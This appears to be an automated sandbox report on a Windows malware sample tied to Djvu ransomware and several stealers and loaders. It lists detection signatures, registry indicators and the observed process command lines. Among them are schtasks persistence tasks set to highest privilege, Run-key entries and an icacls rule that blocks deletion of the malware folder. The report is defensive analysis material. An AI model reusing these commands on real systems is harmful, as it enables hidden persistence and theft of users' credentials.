Malware Analysis Report

2025-01-02 03:50

Sample ID: 231211-m4z41sebf8
Target: 6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d
SHA256: 6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d
Tags: dcrat djvu privateloader risepro smokeloader zgrat pu10 backdoor paypal collection discovery evasion infostealer loader persistence phishing ransomware rat spyware stealer themida trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis Overview

Score: 10/10
SHA256: 6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d

Threat Level: Known bad

The file 6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d was found to be: Known bad.

Malicious Activity Summary


DcRat
ZGRat
RisePro
Detected Djvu ransomware
PrivateLoader
SmokeLoader
Djvu Ransomware
Detect ZGRat V1
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Modifies file permissions
Checks BIOS information in registry
Reads user/profile data of web browsers
Reads user/profile data of local email clients
Checks computer location settings
Executes dropped EXE
Drops startup file
Themida packer
.NET Reactor protector
Deletes itself
Adds Run key to start application
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Checks whether UAC is enabled
AutoIT Executable
Drops file in System32 directory
Suspicious use of SetThreadContext
Detected potential entity reuse from brand paypal.
Suspicious use of NtSetInformationThreadHideFromDebugger
Program crash
Enumerates physical storage devices
Unsigned PE
Checks SCSI registry key(s)
outlook_office_path
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Checks processor information in registry
Creates scheduled task(s)
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
outlook_win_path
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-12-11 11:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-12-11 11:01
Reported: 2023-12-11 11:04
Platform: win10v2004-20231201-en
Max time kernel: 150s
Max time network: 153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\0c74d987-e07e-499b-b0eb-21eaa09fb6b6\\C025.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\C025.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A (2 identical rows)

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A (26 identical rows)

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A (9 identical rows)

Djvu Ransomware

ransomware djvu

PrivateLoader

loader privateloader

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\A818.exe N/A

Downloads MZ/PE file

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A (3 identical rows)

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\A818.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\A818.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\C025.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FANBooster131.lnk C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A (3 identical rows)

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\0c74d987-e07e-499b-b0eb-21eaa09fb6b6\\C025.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\C025.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\6205.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MaxLoonaFest131 = "C:\\Users\\Admin\\AppData\\Local\\MaxLoonaFest131\\MaxLoonaFest131.exe" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\A818.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A (2 identical rows)

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\A818.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4820 set thread context of 1440 N/A C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe
PID 3008 set thread context of 4240 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 3752 set thread context of 3856 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe
PID 800 set thread context of 4184 N/A C:\Users\Admin\AppData\Local\Temp\C835.exe C:\Users\Admin\AppData\Local\Temp\C835.exe
PID 752 set thread context of 5052 N/A C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe
PID 5052 set thread context of 7500 N/A C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
PID 7500 set thread context of 5052 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
PID 7372 set thread context of 7568 N/A C:\Users\Admin\AppData\Local\Temp\tclviqkxt.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
PID 7568 set thread context of 5196 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 7568 set thread context of 1796 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4CW110XU.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4CW110XU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4CW110XU.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A (2 identical rows)

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe N/A (2 identical rows)
N/A N/A N/A N/A (62 identical rows)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (20 identical rows)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege N/A N/A N/A (5 alternating pairs)
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\C835.exe N/A (2 identical rows)
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\704E.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe N/A
Token: SeShutdownPrivilege / SeCreatePagefilePrivilege N/A N/A N/A (19 alternating pairs)
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe N/A (2 identical rows)
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tclviqkxt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A (4 identical rows)

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A (4 identical rows)
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A
N/A N/A N/A N/A (2 identical rows)
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A (2 identical rows)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (25 identical rows)
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A (3 identical rows)
N/A N/A N/A N/A (2 identical rows)
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A (2 identical rows)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A (3 identical rows)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (24 identical rows)
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe N/A (3 identical rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4820 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe (6 identical rows)
PID 3600 wrote to memory of 980 N/A N/A C:\Windows\system32\cmd.exe (2 identical rows)
PID 980 wrote to memory of 3608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe (2 identical rows)
PID 3600 wrote to memory of 4612 N/A N/A C:\Users\Admin\AppData\Local\Temp\A818.exe (3 identical rows)
PID 3600 wrote to memory of 3008 N/A N/A C:\Users\Admin\AppData\Local\Temp\C025.exe (3 identical rows)
PID 3008 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe (10 identical rows)
PID 4240 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Windows\SysWOW64\icacls.exe (3 identical rows)
PID 4240 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe (3 identical rows)
PID 3752 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\C025.exe C:\Users\Admin\AppData\Local\Temp\C025.exe (10 identical rows)
PID 3600 wrote to memory of 800 N/A N/A C:\Users\Admin\AppData\Local\Temp\C835.exe (2 identical rows)
PID 800 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\C835.exe C:\Users\Admin\AppData\Local\Temp\C835.exe (6 identical rows)
PID 3600 wrote to memory of 4880 N/A N/A C:\Users\Admin\AppData\Local\Temp\6205.exe (3 identical rows)
PID 4880 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\6205.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe (3 identical rows)
PID 516 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe (3 identical rows)
PID 3172 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe C:\Windows\SysWOW64\schtasks.exe (3 identical rows)
PID 3172 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe C:\Windows\SysWOW64\schtasks.exe (2 identical rows)

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2192493100-457715857-1189582111-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe

"C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe"

C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe

"C:\Users\Admin\AppData\Local\Temp\6c259995bee7f47475c57128bef3da05d5eb87d0fde658488e85ac0e0aa2fb8d.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1440 -ip 1440

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 328

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9C21.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\A818.exe

C:\Users\Admin\AppData\Local\Temp\A818.exe

C:\Users\Admin\AppData\Local\Temp\C025.exe

C:\Users\Admin\AppData\Local\Temp\C025.exe

C:\Users\Admin\AppData\Local\Temp\C025.exe

C:\Users\Admin\AppData\Local\Temp\C025.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\0c74d987-e07e-499b-b0eb-21eaa09fb6b6" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\C025.exe

"C:\Users\Admin\AppData\Local\Temp\C025.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\C025.exe

"C:\Users\Admin\AppData\Local\Temp\C025.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3856 -ip 3856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 584

C:\Users\Admin\AppData\Local\Temp\C835.exe

C:\Users\Admin\AppData\Local\Temp\C835.exe

C:\Users\Admin\AppData\Local\Temp\C835.exe

C:\Users\Admin\AppData\Local\Temp\C835.exe

C:\Users\Admin\AppData\Local\Temp\6205.exe

C:\Users\Admin\AppData\Local\Temp\6205.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wc0LF94.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1dm70bp2.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\704E.exe

C:\Users\Admin\AppData\Local\Temp\704E.exe

C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe

C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3172 -ip 3172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 1736

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4CW110XU.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4CW110XU.exe

C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe

C:\Users\Admin\AppData\Local\AceFlags\yafqg\ContextProperties.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Pv3II0.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff916cb46f8,0x7ff916cb4708,0x7ff916cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

